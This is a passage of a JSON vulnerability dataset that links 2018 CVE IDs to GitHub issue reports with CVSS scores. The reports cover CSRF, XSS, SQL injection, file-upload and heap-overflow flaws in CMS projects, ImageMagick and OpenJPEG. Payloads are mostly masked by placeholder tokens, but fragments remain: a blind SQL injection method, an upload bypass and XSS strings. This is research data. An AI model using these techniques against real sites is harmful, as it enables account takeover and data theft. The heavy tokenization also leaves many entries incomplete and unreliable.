fff9dc0: fa fa fa fa fa fa fa fa fa 
fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa POC2 URLTAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef3e at pc NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG bp NUMBERTAG ffde NUMBERTAG sp NUMBERTAG ffde NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef3e thread T NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG in bool APITAG APITAG char >(unsigned char ) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ebd in std::iterator_traits<unsigned char >::difference_type std::__count_if<unsigned char , APITAG const> >(unsigned char , unsigned char , APITAG const>) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG d NUMBERTAG in std::iterator_traits<unsigned char >::difference_type std::count<unsigned char , char>(unsigned char , unsigned char , char const&) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ef in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG f6f9e7 in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG eafe NUMBERTAG in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG de8 in _start ( PATHTAG NUMBERTAG ef3e is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG a5aa6b2 in operator 
APITAG long) ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG eafb3a in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG bool APITAG APITAG char >(unsigned char ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa",
  24345. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24346. "severity": "MEDIUM",
  24347. "baseScore": 6.5,
  24348. "impactScore": 3.6,
  24349. "exploitabilityScore": 2.8
  24350. },
  24351. {
  24352. "CVE_ID": "CVE-2018-16337",
  24353. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/2",
  24354. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/2",
  24355. "Repo_new": "chshcms/cscms",
  24356. "Issue_Created_At": "2018-08-11T02:01:08Z",
  24357. "description": "There is a CSRF vulnerability that can modify website basic configuration NUMBERTAG before modification FILETAG NUMBERTAG CSRF POC FILETAG FILETAG NUMBERTAG after modification FILETAG NUMBERTAG CSRF POC FILETAG",
  24358. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24359. "severity": "MEDIUM",
  24360. "baseScore": 6.5,
  24361. "impactScore": 3.6,
  24362. "exploitabilityScore": 2.8
  24363. },
  24364. {
  24365. "CVE_ID": "CVE-2018-16338",
  24366. "Issue_Url_old": "https://github.com/auracms/AuraCMS/issues/3",
  24367. "Issue_Url_new": "https://github.com/auracms/auracms/issues/3",
  24368. "Repo_new": "auracms/auracms",
  24369. "Issue_Created_At": "2018-08-13T08:34:23Z",
  24370. "description": "There is a cross site request forgery vulnerability in FILETAG . There is a cross site request forgery vulnerability in APITAG It and can change administrator's password. First: After the administrator logged in,open the poc page. FILETAG to FILETAG NUMBERTAG add page NUMBERTAG add APITAG topic NUMBERTAG add page FILETAG FILETAG NUMBERTAG add menu FILETAG FILETAG FILETAG NUMBERTAG submit topic FILETAG FILETAG NUMBERTAG CSRF POC: FILETAG",
  24371. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24372. "severity": "HIGH",
  24373. "baseScore": 8.8,
  24374. "impactScore": 5.9,
  24375. "exploitabilityScore": 2.8
  24376. },
  24377. {
  24378. "CVE_ID": "CVE-2018-16339",
  24379. "Issue_Url_old": "https://github.com/sbmzhcn/EmpireCMS/issues/1",
  24380. "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/1",
  24381. "Repo_new": "leadscloud/empirecms",
  24382. "Issue_Created_At": "2018-08-11T04:49:37Z",
  24383. "description": "There is a CSRF vulnerability that can add administrator.. After the administrator logged in,open the poc page. copy FILETAG to FILETAG and let the administrator open the FILETAG vulnerability PATHTAG Before modification FILETAG FILETAG After modification FILETAG Poc location: FILETAG",
  24384. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24385. "severity": "HIGH",
  24386. "baseScore": 8.8,
  24387. "impactScore": 5.9,
  24388. "exploitabilityScore": 2.8
  24389. },
  24390. {
  24391. "CVE_ID": "CVE-2018-16342",
  24392. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/325",
  24393. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/325",
  24394. "Repo_new": "star7th/showdoc",
  24395. "Issue_Created_At": "2018-07-30T12:02:55Z",
  24396. "description": "We found a stored xss vulnerability in APITAG Hello friend,we are farmsec security team,we found a stored xss vulnerability in APITAG APITAG to register FILETAG APITAG in user information FILETAG Click to register. APITAG a new project FILETAG Click new project. APITAG in the project information FILETAG Click submit. APITAG on the new project FILETAG Click on the new project xss test APITAG + to create a new page FILETAG APITAG in the xss vulnerability test payload payload: ERRORTAG Click save FILETAG Access page FILETAG APITAG the user's cookie information FILETAG",
  24397. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24398. "severity": "MEDIUM",
  24399. "baseScore": 5.4,
  24400. "impactScore": 2.7,
  24401. "exploitabilityScore": 2.3
  24402. },
  24403. {
  24404. "CVE_ID": "CVE-2018-16345",
  24405. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/5",
  24406. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/5",
  24407. "Repo_new": "teameasy/easycms",
  24408. "Issue_Created_At": "2018-07-26T03:55:04Z",
  24409. "description": "There is two CSRF vulnerability that can add a ordinary user and update the administrator password. After the administrator logged in, open the following page poc: FILETAG update the admin password CODETAG FILETAG add a ordinary user CODETAG",
  24410. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24411. "severity": "HIGH",
  24412. "baseScore": 8.8,
  24413. "impactScore": 5.9,
  24414. "exploitabilityScore": 2.8
  24415. },
  24416. {
  24417. "CVE_ID": "CVE-2018-16346",
  24418. "Issue_Url_old": "https://github.com/chemcms/ChemCMS/issues/2",
  24419. "Issue_Url_new": "https://github.com/chemcms/chemcms/issues/2",
  24420. "Repo_new": "chemcms/chemcms",
  24421. "Issue_Created_At": "2018-07-30T11:52:13Z",
  24422. "description": "There is a xss vulnerability APITAG Privilege. A xss vulnerability was discovered in APITAG step NUMBERTAG login the backstage step NUMBERTAG go to the page setting >website information and fill the poc APITAG alert(\"xss\") APITAG to statistic code FILETAG",
  24423. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24424. "severity": "MEDIUM",
  24425. "baseScore": 4.8,
  24426. "impactScore": 2.7,
  24427. "exploitabilityScore": 1.7
  24428. },
  24429. {
  24430. "CVE_ID": "CVE-2018-16347",
  24431. "Issue_Url_old": "https://github.com/gleez/cms/issues/798",
  24432. "Issue_Url_new": "https://github.com/gleez/cms/issues/798",
  24433. "Repo_new": "gleez/cms",
  24434. "Issue_Created_At": "2018-08-09T08:17:45Z",
  24435. "description": "There is a XSS vulnerability that can execute javascript. Founded in your demo site. URLTAG Visit this address with Firefox browser and it shows a forbidden page APITAG Then insert the payload APITAG alert NUMBERTAG APITAG then u can see this page alert NUMBERTAG at once. APITAG Obviously, some js code can be executed.",
  24436. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24437. "severity": "MEDIUM",
  24438. "baseScore": 6.1,
  24439. "impactScore": 2.7,
  24440. "exploitabilityScore": 2.8
  24441. },
  24442. {
  24443. "CVE_ID": "CVE-2018-16349",
  24444. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/147",
  24445. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/147",
  24446. "Repo_new": "wuzhicms/wuzhicms",
  24447. "Issue_Created_At": "2018-07-28T15:31:07Z",
  24448. "description": "wuzhicms NUMBERTAG has a XSS vulnerability in form FILETAG CODETAG When administrators access the expansion module link, it triggers XSS vulnerability. FILETAG image URLTAG",
  24449. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24450. "severity": "MEDIUM",
  24451. "baseScore": 6.1,
  24452. "impactScore": 2.7,
  24453. "exploitabilityScore": 2.8
  24454. },
  24455. {
  24456. "CVE_ID": "CVE-2018-16350",
  24457. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/148",
  24458. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/148",
  24459. "Repo_new": "wuzhicms/wuzhicms",
  24460. "Issue_Created_At": "2018-07-28T15:32:20Z",
  24461. "description": "wuzhicms NUMBERTAG has a XSS vulnerability in form FILETAG CODETAG When an administrator accesses the CMS home page, it triggers a XSS vulnerability FILETAG FILETAG",
  24462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24463. "severity": "MEDIUM",
  24464. "baseScore": 6.1,
  24465. "impactScore": 2.7,
  24466. "exploitabilityScore": 2.8
  24467. },
  24468. {
  24469. "CVE_ID": "CVE-2018-16352",
  24470. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/8",
  24471. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/8",
  24472. "Repo_new": "alterebro/weaselcms",
  24473. "Issue_Created_At": "2018-08-25T12:20:05Z",
  24474. "description": "There is a .php file upload Vulnerbility. There is a .php file upload Vulnerbility in FILETAG FILETAG use mime type to forbidden php file is not safe,we can first edit the png file's name FILETAG then add the php code at the end FILETAG file was uploaded successfully! FILETAG",
  24475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24476. "severity": "CRITICAL",
  24477. "baseScore": 9.8,
  24478. "impactScore": 5.9,
  24479. "exploitabilityScore": 3.9
  24480. },
  24481. {
  24482. "CVE_ID": "CVE-2018-16353",
  24483. "Issue_Url_old": "https://github.com/focalhot/FHCRM/issues/3",
  24484. "Issue_Url_new": "https://github.com/focalhot/fhcrm/issues/3",
  24485. "Repo_new": "focalhot/FHCRM",
  24486. "Issue_Created_At": "2018-08-08T04:09:20Z",
  24487. "description": "there is a sql injection via PATHTAG FILETAG there is a sql injection via $limit parameter we can use the function BENCHMARK to excute blind injection FILETAG FILETAG",
  24488. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24489. "severity": "CRITICAL",
  24490. "baseScore": 9.8,
  24491. "impactScore": 5.9,
  24492. "exploitabilityScore": 3.9
  24493. },
  24494. {
  24495. "CVE_ID": "CVE-2018-16354",
  24496. "Issue_Url_old": "https://github.com/focalhot/FHCRM/issues/4",
  24497. "Issue_Url_new": "https://github.com/focalhot/fhcrm/issues/4",
  24498. "Repo_new": "focalhot/FHCRM",
  24499. "Issue_Created_At": "2018-08-08T08:25:20Z",
  24500. "description": "There is a sql injection via PATHTAG FILETAG there is a sql injection via $limit parameter we can use the function BENCHMARK to excute blind injection payload: URLTAG PROCEDURE APITAG LIKE NUMBERTAG APITAG FILETAG the response time will be longer if the first the first number of mysql version is NUMBERTAG FILETAG",
  24501. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24502. "severity": "CRITICAL",
  24503. "baseScore": 9.8,
  24504. "impactScore": 5.9,
  24505. "exploitabilityScore": 3.9
  24506. },
  24507. {
  24508. "CVE_ID": "CVE-2018-16362",
  24509. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/286",
  24510. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/286",
  24511. "Repo_new": "mantisbt-plugins/source-integration",
  24512. "Issue_Created_At": "2018-09-01T18:04:58Z",
  24513. "description": "x.",
  24514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24515. "severity": "MEDIUM",
  24516. "baseScore": 6.1,
  24517. "impactScore": 2.7,
  24518. "exploitabilityScore": 2.8
  24519. },
  24520. {
  24521. "CVE_ID": "CVE-2018-16365",
  24522. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/32",
  24523. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/32",
  24524. "Repo_new": "idreamsoft/iCMS",
  24525. "Issue_Created_At": "2018-08-01T00:44:41Z",
  24526. "description": "There is one CSRF vulnerability that can add the administrator account. Although the Token value is set, the Token value is displayed in the Get request and does not change. The system also has a referer detection, so the environment is set up on the server, bypassing the referer detection. Vulnerability PATHTAG poc\uff1a APITAG APITAG APITAG APITAG APITAG APITAG PATHTAG ) APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  24527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24528. "severity": "HIGH",
  24529. "baseScore": 8.8,
  24530. "impactScore": 5.9,
  24531. "exploitabilityScore": 2.8
  24532. },
  24533. {
  24534. "CVE_ID": "CVE-2018-16367",
  24535. "Issue_Url_old": "https://github.com/QingdaoU/OnlineJudge/issues/165",
  24536. "Issue_Url_new": "https://github.com/qingdaou/onlinejudge/issues/165",
  24537. "Repo_new": "qingdaou/onlinejudge",
  24538. "Issue_Created_At": "2018-08-09T14:16:20Z",
  24539. "description": "There is a incorrect access control vulnerability that can write file anywhere. \u5728\u63d0\u4ea4issue\u4e4b\u524d\u8bf7 \u8ba4\u771f\u9605\u8bfb\u6587\u6863 URLTAG \u641c\u7d22\u548c\u67e5\u770b\u5386\u53f2issues \u7136\u540e\u63d0\u4ea4issue\u8bf7\u5199\u6e05\u695a\u4e0b\u5217\u4e8b\u9879 \u00a0 \u8fdb\u884c\u4ec0\u4e48\u64cd\u4f5c\u7684\u65f6\u5019\u9047\u5230\u4e86\u4ec0\u4e48\u95ee\u9898\uff0c\u6700\u597d\u80fd\u6709\u590d\u73b0\u6b65\u9aa4 \u00a0 APITAG \u4f60\u5c1d\u8bd5\u4fee\u590d\u95ee\u9898\u7684\u64cd\u4f5c \u9875\u9762\u95ee\u9898\u8bf7\u5199\u6e05\u6d4f\u89c8\u5668\u7248\u672c\uff0c\u5c3d\u91cf\u6709\u622a\u56fe",
  24540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  24541. "severity": "CRITICAL",
  24542. "baseScore": 9.9,
  24543. "impactScore": 6.0,
  24544. "exploitabilityScore": 3.1
  24545. },
  24546. {
  24547. "CVE_ID": "CVE-2018-16371",
  24548. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/3",
  24549. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/3",
  24550. "Repo_new": "lazyphp/pescms-team",
  24551. "Issue_Created_At": "2018-08-30T15:30:44Z",
  24552. "description": "PECSM TEAM NUMBERTAG has multiple reflected Cross Site Scripting Vulnerability. I found multiple reflected cross site scripting vulnerability where the page use FILETAG ,we can see where is no XSS filter in \"keyword\" parameter. FILETAG now I input payload :aa\"> APITAG the full url is : URLTAG and the code is running FILETAG and there are lots of pages use APITAG they all have reflected cross site scripting APITAG URLTAG URLTAG URLTAG URLTAG .. .. ..",
  24553. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24554. "severity": "MEDIUM",
  24555. "baseScore": 6.1,
  24556. "impactScore": 2.7,
  24557. "exploitabilityScore": 2.8
  24558. },
  24559. {
  24560. "CVE_ID": "CVE-2018-16372",
  24561. "Issue_Url_old": "https://github.com/iechoo/ideacms/issues/1",
  24562. "Issue_Url_new": "https://github.com/iechoo/ideacms/issues/1",
  24563. "Repo_new": "iechoo/ideacms",
  24564. "Issue_Created_At": "2018-08-07T08:41:11Z",
  24565. "description": "Ideacms has a reflected Cross Site Scripting Vulnerability. I have found a reflected Cross Site Scripting Vulnerability. The parameter \u2018kw\u2019 lack of xss_clean function to checkout user's input ,that cause a reflected xss vulnerability. payload\uff1a APITAG FILETAG",
  24566. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24567. "severity": "MEDIUM",
  24568. "baseScore": 6.1,
  24569. "impactScore": 2.7,
  24570. "exploitabilityScore": 2.8
  24571. },
  24572. {
  24573. "CVE_ID": "CVE-2018-16373",
  24574. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/13",
  24575. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/13",
  24576. "Repo_new": "philippe/frogcms",
  24577. "Issue_Created_At": "2018-08-24T07:29:45Z",
  24578. "description": "Frog CMS NUMBERTAG has a file upload Vulnerability in PATHTAG When I check this function ,I found out in line NUMBERTAG we can see if filename did not exists,we can also upload a new file and new content throuth APITAG function,and in line NUMBERTAG file create directly. FILETAG then i try to upload a new filename and new content in this request FILETAG and the code is running FILETAG",
  24579. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  24580. "severity": "MEDIUM",
  24581. "baseScore": 4.9,
  24582. "impactScore": 3.6,
  24583. "exploitabilityScore": 1.2
  24584. },
  24585. {
  24586. "CVE_ID": "CVE-2018-16374",
  24587. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/14",
  24588. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/14",
  24589. "Repo_new": "philippe/frogcms",
  24590. "Issue_Created_At": "2018-08-28T14:53:56Z",
  24591. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting vulnerability in URLTAG FILETAG When I click save button,the http request like this: FILETAG And the rowspage parameter was not XSS filtered resulting in storage XSS vulnerability FILETAG EXP is as follows: FILETAG The result of EXP is as follows: FILETAG",
  24592. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24593. "severity": "MEDIUM",
  24594. "baseScore": 4.8,
  24595. "impactScore": 2.7,
  24596. "exploitabilityScore": 1.7
  24597. },
  24598. {
  24599. "CVE_ID": "CVE-2018-16375",
  24600. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1126",
  24601. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1126",
  24602. "Repo_new": "uclouvain/openjpeg",
  24603. "Issue_Created_At": "2018-07-26T12:31:16Z",
  24604. "description": "Missing checks for APITAG and APITAG in function pnmtoimage in PATHTAG which can lead to heap buffer overflow. Function pnmtoimage in PATHTAG misses checks for APITAG and APITAG which can lead to heap buffer overflow. (see NUMBERTAG CODETAG Below is the proposal patch. CODETAG",
  24605. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24606. "severity": "HIGH",
  24607. "baseScore": 8.8,
  24608. "impactScore": 5.9,
  24609. "exploitabilityScore": 2.8
  24610. },
  24611. {
  24612. "CVE_ID": "CVE-2018-16376",
  24613. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1127",
  24614. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1127",
  24615. "Repo_new": "uclouvain/openjpeg",
  24616. "Issue_Created_At": "2018-07-26T12:39:30Z",
  24617. "description": "Potential heap based buffer overflow in function t2_encode_packet in PATHTAG . There are two missing checks for length in function t2_encode_packet in PATHTAG . (see NUMBERTAG ERRORTAG Below is the proposal patch for t2_encode_packet function. ERRORTAG",
  24618. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24619. "severity": "HIGH",
  24620. "baseScore": 8.8,
  24621. "impactScore": 5.9,
  24622. "exploitabilityScore": 2.8
  24623. },
  24624. {
  24625. "CVE_ID": "CVE-2018-16380",
  24626. "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/39",
  24627. "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/39",
  24628. "Repo_new": "n00dles/ogma-CMS",
  24629. "Issue_Created_At": "2018-08-22T12:26:42Z",
  24630. "description": "Here's a CSRF vulnerability NUMBERTAG Here's a CSRF vulnerability. Due to the lack of corresponding verification measures, when the administrator logs into the background of the website, the malicious HTML file constructed by the attacker will be automatically added to the administrator account. An attacker can log into the background as an administrator for a series of operations. POC: CODETAG Finally, the file is executed and the administrator account is successfully executed. FILETAG",
  24631. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24632. "severity": "HIGH",
  24633. "baseScore": 8.8,
  24634. "impactScore": 5.9,
  24635. "exploitabilityScore": 2.8
  24636. },
  24637. {
  24638. "CVE_ID": "CVE-2018-16385",
  24639. "Issue_Url_old": "https://github.com/top-think/framework/issues/1375",
  24640. "Issue_Url_new": "https://github.com/top-think/framework/issues/1375",
  24641. "Repo_new": "top-think/framework",
  24642. "Issue_Created_At": "2018-08-10T09:32:09Z",
  24643. "description": "APITAG SQL\u6ce8\u5165\u6f0f\u6d1e. \u6f0f\u6d1e\u5229\u7528 \u6f0f\u6d1edemo\u4ee3\u7801\uff1a ERRORTAG \u6f0f\u6d1e\u539f\u56e0\u662f\u5904\u7406order by\u53c2\u6570\u65f6\uff0c\u5982\u679c\u53c2\u6570\u7528\u6237\u53ef\u63a7\uff0c\u5f53\u53c2\u6570\u4e3a\u6570\u7ec4key APITAG \u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\u5373\u53ef\u89e6\u53d1SQL\u6ce8\u5165\u6f0f\u6d1e\uff1a APITAG FILETAG \u53ef\u4ee5\u770b\u5230\u6211\u4eec\u6210\u529f\u83b7\u53d6\u5230\u6570\u636e\u5e93\u4e2d\u7684\u5f53\u524d\u7528\u6237\u540d\u3002 \u4fee\u590d\u5efa\u8bae \u5bf9order by\u8bed\u53e5\u5904\u7406\u6d41\u7a0b\u52a0\u4e0a\u6570\u7ec4\u5206\u652f\u5b89\u5168\u6821\u9a8c\u3002",
  24644. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24645. "severity": "CRITICAL",
  24646. "baseScore": 9.8,
  24647. "impactScore": 5.9,
  24648. "exploitabilityScore": 3.9
  24649. },
  24650. {
  24651. "CVE_ID": "CVE-2018-16387",
  24652. "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/285",
  24653. "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/285",
  24654. "Repo_new": "jbroadway/elefant",
  24655. "Issue_Created_At": "2018-08-09T09:00:46Z",
  24656. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a admin ERRORTAG",
  24657. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24658. "severity": "HIGH",
  24659. "baseScore": 8.8,
  24660. "impactScore": 5.9,
  24661. "exploitabilityScore": 2.8
  24662. },
  24663. {
  24664. "CVE_ID": "CVE-2018-16409",
  24665. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5372",
  24666. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5372",
  24667. "Repo_new": "gogs/gogs",
  24668. "Issue_Created_At": "2018-08-09T08:33:32Z",
  24669. "description": "server side request forgery (SSRF) vulnerability in migrate. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG x ] Yes ( URLTAG [ ] No [ ] Not relevant Log gist (usually found in APITAG ): Description attacker may use [migrate URLTAG to send arbitrary http get requests. impact just like NUMBERTAG APITAG Patch only allow migration from trusted sources URLTAG salt of Tencent's Xuanwu Lab",
  24670. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  24671. "severity": "HIGH",
  24672. "baseScore": 8.6,
  24673. "impactScore": 4.0,
  24674. "exploitabilityScore": 3.9
  24675. },
  24676. {
  24677. "CVE_ID": "CVE-2018-16413",
  24678. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1251",
  24679. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1251",
  24680. "Repo_new": "imagemagick/imagemagick",
  24681. "Issue_Created_At": "2018-08-19T14:25:19Z",
  24682. "description": "heap buffer overflow bug in APITAG APITAG APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch PATHTAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Feb NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: APITAG May I know whether this can be assigned with a CVE ID?",
  24683. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24684. "severity": "HIGH",
  24685. "baseScore": 8.8,
  24686. "impactScore": 5.9,
  24687. "exploitabilityScore": 2.8
  24688. },
  24689. {
  24690. "CVE_ID": "CVE-2018-16413",
  24691. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1249",
  24692. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1249",
  24693. "Repo_new": "imagemagick/imagemagick",
  24694. "Issue_Created_At": "2018-08-16T12:19:36Z",
